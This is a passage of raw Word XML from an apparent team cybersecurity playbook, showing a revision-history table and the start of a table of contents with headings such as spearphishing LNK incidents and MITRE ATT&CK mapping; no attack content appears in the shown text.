              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="3C8C28D4" w:rsidP="01BC291B" w:rsidRDefault="3C8C28D4" w14:paraId="7C24425E" w14:textId="45B159E2">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Member 2 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="3C8C28D4" w:rsidP="6D133685" w:rsidRDefault="3C8C28D4" w14:paraId="2E5B1A4B" w14:textId="459FFB2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Mohamed Hasif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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Pr="00CB4373" w:rsidR="00C000BA" w:rsidP="001D327F" w:rsidRDefault="47B75D4E" w14:paraId="3D4BF339" w14:textId="1E494DA6">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00C000BA" w:rsidTr="3C8C28D4" w14:paraId="1E64B1CA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00C000BA" w:rsidP="001D327F" w:rsidRDefault="28F96AAB" w14:paraId="4A4A5A62" w14:textId="51BD2586">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00C000BA" w:rsidP="001D327F" w:rsidRDefault="63B205A3" w14:paraId="217A4914" w14:textId="63DE443A">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="3C8C28D4" w:rsidP="6D133685" w:rsidRDefault="5C33BDE2" w14:paraId="7D602604" w14:textId="5A40D308">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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Pr="00CB4373" w:rsidR="00C000BA" w:rsidP="001D327F" w:rsidRDefault="47B75D4E" w14:paraId="510DEDB2" w14:textId="12D46F16">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="0010538C" w:rsidTr="3C8C28D4" w14:paraId="65C145B4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="0010538C" w:rsidP="001D327F" w:rsidRDefault="28F96AAB" w14:paraId="116006A9" w14:textId="7C706B98">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> January 2026</w:t>
            </w:r>
            <w:commentRangeStart w:id="5"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="0010538C" w:rsidP="001D327F" w:rsidRDefault="00CB4373" w14:paraId="2BEC3E63" w14:textId="447A8265">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:commentRangeEnd w:id="5"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="5"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="3C8C28D4" w:rsidP="6D133685" w:rsidRDefault="3EAB24F4" w14:paraId="23DD12E0" w14:textId="49F8B461">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410"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Pr="00CB4373" w:rsidR="0010538C" w:rsidP="001D327F" w:rsidRDefault="47B75D4E" w14:paraId="37A23B14" w14:textId="481A7216">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added Incident #004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="63B205A3" w:rsidTr="63B205A3" w14:paraId="0B788D61" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="63B205A3" w:rsidP="63B205A3" w:rsidRDefault="29667AA3" w14:paraId="15DC012E" w14:textId="37F55772">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>nd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> February 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="63B205A3" w:rsidP="63B205A3" w:rsidRDefault="63B205A3" w14:paraId="7CC4246F" w14:textId="16AD683E">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="63B205A3" w:rsidP="63B205A3" w:rsidRDefault="00E62E14" w14:paraId="0B374711" w14:textId="6EC13D57">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="2" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="55" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="55" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="63B205A3" w:rsidP="63B205A3" w:rsidRDefault="63B205A3" w14:paraId="051F9D02" w14:textId="0C0B55A1">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Final Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="004D5913" w:rsidR="004D5913" w:rsidP="004D5913" w:rsidRDefault="00AD4208" w14:paraId="429C099E" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008F3365" w:rsidR="008F3365" w:rsidP="008F3365" w:rsidRDefault="004D5913" w14:paraId="67CF37F2" w14:textId="08470540">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="1C075EAA" w14:paraId="580F2612" w14:textId="233D18E1">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>TOC \o "1-3" \z \u \h</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:history="1" w:anchor="_Toc220896675">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Declaration of Originality</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896675 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>2</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="58345DAC" w14:textId="053019DF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896676">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Document Control</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896676 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>4</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="6BFA8738" w14:textId="11927CCE">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896677">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Playbook TTP Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896677 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>6</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="0522533A" w14:textId="6AE8498A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896678">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detailed List of Cybersecurity Incidents &amp; TTPs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896678 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>7</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="10DF907F" w14:textId="565176F6">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896679">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896679 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>7</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="6BB702FE" w14:textId="5247D994">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80">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896680 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>7</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="66FAC694" w14:textId="38CA9DDB">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81">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
